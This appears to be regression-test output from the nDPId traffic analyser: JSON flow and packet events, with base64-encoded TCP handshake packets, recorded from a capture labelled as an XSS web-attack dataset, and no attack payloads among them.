+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347989526,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347989526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8S9BAAD4GegCsEAABwKgKMof2AFDafYYCAAAAAKACchCnLgAAAgQFtAQCCAoBPM3SAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":2,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh\/a7HZT72n2GA6AScSC0xwAAAgQFtAQCCAoD5p9GATzN0gEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8480,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":3,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0S9FAAD4GegesEAABwKgKMof2AFDafYYDux2U\/IAQAOVTzgAAAQEICgE8zdMD5p9G"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347992139,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347992139,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"ABm5CmnxAMGxFOsxCABFAAA866dAAD4G2iisEAABwKgKMogQAFBfGDvHAAAAAKACchBqJwAAAgQFtAQCCAoBPNBgAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":2,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiBBHAQA0Xxg7yKAScSB+FgAAAgQFtAQCCAoD5qHUATzQYAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":3,"flow_last_seen":1499347992140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347992140,"pkt":"ABm5CmnxAMGxFOsxCABFAAA066hAAD4G2i+sEAABwKgKMogQAFBfGDvIRwEANYAQAOUdHgAAAQEICgE80GAD5qHU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347993411,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347993411,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wWNAAD4GBG2sEAABwKgKMogeAFD5yRD9AAAAAKACchD48wAAAgQFtAQCCAoBPNGeAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":2,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiB6gRZIr+ckQ\/qAScSAgaQAAAgQFtAQCCAoD5qMSATzRngEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":3,"flow_last_seen":1499347993412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347993412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wWRAAD4GBHSsEAABwKgKMogeAFD5yRD+oEWSLIAQAOW\/cAAAAQEICgE80Z4D5qMS"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347994680,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347994680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eXlAAD4GTFesEAABwKgKMogsAFCPtauiAAAAAKACchDHFwAAAgQFtAQCCAoBPNLbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":2,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiCwnn9QNj7Wro6AScSAkFAAAAgQFtAQCCAoD5qRPATzS2wEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":3,"flow_last_seen":1499347994681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347994681,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eXpAAD4GTF6sEAABwKgKMogsAFCPtaujJ5\/UDoAQAOXDGwAAAQEICgE80tsD5qRP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347997344,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347997344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nDhAAD4GKZisEAABwKgKMohGAFAyaklNAAAAAKACchCEBAAAAgQFtAQCCAoBPNV1AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":2,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiEaQGXl+MmpJTqAScSDQewAAAgQFtAQCCAoD5qbpATzVdQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":3,"flow_last_seen":1499347997345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347997345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nDlAAD4GKZ+sEAABwKgKMohGAFAyaklOkBl5f4AQAOVvgwAAAQEICgE81XUD5qbp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347998605,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347869628,"flow_last_seen":1499347874866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347873465,"flow_last_seen":1499347878867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
